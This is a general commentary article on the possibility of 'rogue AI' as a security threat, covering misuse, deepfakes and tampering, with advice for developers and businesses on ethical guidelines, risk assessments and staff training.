Since we can all be prone to hyperbole, it could be easy to look at the discourse around AI — especially as ChatGPT rose to prominence in late 2022 and early 2023 — and think people are just overreacting when they say it’ll be the end of the world or of work as we know it. New technologies come around all the time, with similar proclamations made, and the world hasn’t ended yet.

But make no mistake: AI represents the possibility of a security threat that is powerful, broad-reaching and hard to stop. As AI advances, the possibility it could be misused or lead to consequences not intended by its creators or users also grows. There are few guardrails in place to keep AI in check; while federal legislation still hasn’t arrived, individual states are taking steps to address potential issues, though those are largely focused on specific use cases and not the broad impact of AI as a whole.

Just look at the way Bing’s AI threatened users or how generative models have been used to generate harmful code at a whim — the threat of AI “going rogue” is a real one, and the technology would be a powerful one to contend with were that to happen. AI is becoming more complex, especially as it learns from its own activity, and the potential of it growing beyond our ability to rein it in is a real one.

What the threats will look like

AI systems could “go rogue” thanks to improper controls or a lack of proper oversight. They could have their programming tampered with by bad actors in order to hack another system, promote disinformation campaigns, or even take part in espionage activities. As AI tools proliferate, they could even be designed with the sole purpose of carrying out nefarious purposes like cyberattacks.

The ability for us to integrate AI with many other aspects of our lives — banking, social media, transportation, healthcare — is a mixed blessing, since the same technology that can empower us in each of these areas also, as a result, has access to and control critical systems that govern how we live.

AI’s incredible speed when sorting through data and making decisions makes it hard to keep up with in real-time if we had to defend against rogue AI. It’s also flexible by nature, able to learn on the fly and adapt to new situations, even replicating itself to a scale that could attack multiple systems simultaneously. And it’s smart enough to first go after the defenses in place that may be used to stop it. What would normally be reserved for the realm of sci-fi or horror is quickly becoming a realistic possibility.

Complicating any would-be reactive measures is rogue AI’s ability to replicate human voices and display what would be considered normal human behavior. AI can replicate human voices with startling accuracy, and the combination of audio and visual “deepfakes” that could be generated easily by AI is another real threat. The technology can have serious implications for the everyday person, a business, or even countries—it’s not inconceivable to imagine a deepfake, like a politician supposedly saying something about another nation, spurring on an international political incident with deadly ramifications. 

How developers and security teams can head off rogue AI

Given the severity of the threats that rogue AI could lead to, a proactive approach from all parties is a must — in some situations, there is no easy fix, but prevention will go a long way.

Developers working on or with AI tools need to make clear guidelines for their entire organization — and partners — on what constitutes ethical use of AI. They should hold all parties accountable for sticking to responsible development practices and implement the strongest security measures they can (since even the strongest policies have room for mistakes and it’s possible a rogue individual will purposely flout them). Developers should review their AI systems and practices frequently, assessing risks and making a plan to address any shortcomings.

Similarly, businesses themselves need to be assertive with their actions and policies around AI — an enterprise does not want to find itself on the back foot and have its everyday processes disrupted by rogue AI. Regular risk assessments and thorough contingency planning were something to go wrong will keep businesses moving ahead. This should include an investment into AI-specific security and risk management, which means training employees (not just those in the security department) to identify the signs of AI threats and building a thorough cybersecurity defense.

Like developers, all enterprises should have a clear outline for how AI is used, if it’s allowed to be at all, in the organization. Establishing clear expectations and boundaries will help ensure that safety and ethical concerns are kept at the forefront and the risk of rogue AI is lessened as much as it can be.

Staying ahead of AI

All technology evolves quickly, but no subset more rapidly than an AI system that is learning as it goes along. It’s important that all businesses and developers collaborate with others in the field and stay up to date on the latest threats and protective measures. Sharing knowledge and encouraging policymakers to enact reasonable and effective industry-wide standards for this technology can keep us all safe and limit the chances of a rogue AI doing real damage to our society.

While we’ve spent a lot of time on the threats of AI, it would be a mistake not to make clear that the possibility of a threatening rogue AI does not cancel out the incredible benefits that responsible AI can bring to enterprises and society as a whole. We simply need to take this moment to prepare ourselves and our company and create a culture of AI security and ethical use so that we can allow the technology to flourish in the right direction, bringing positive change and advancement for all.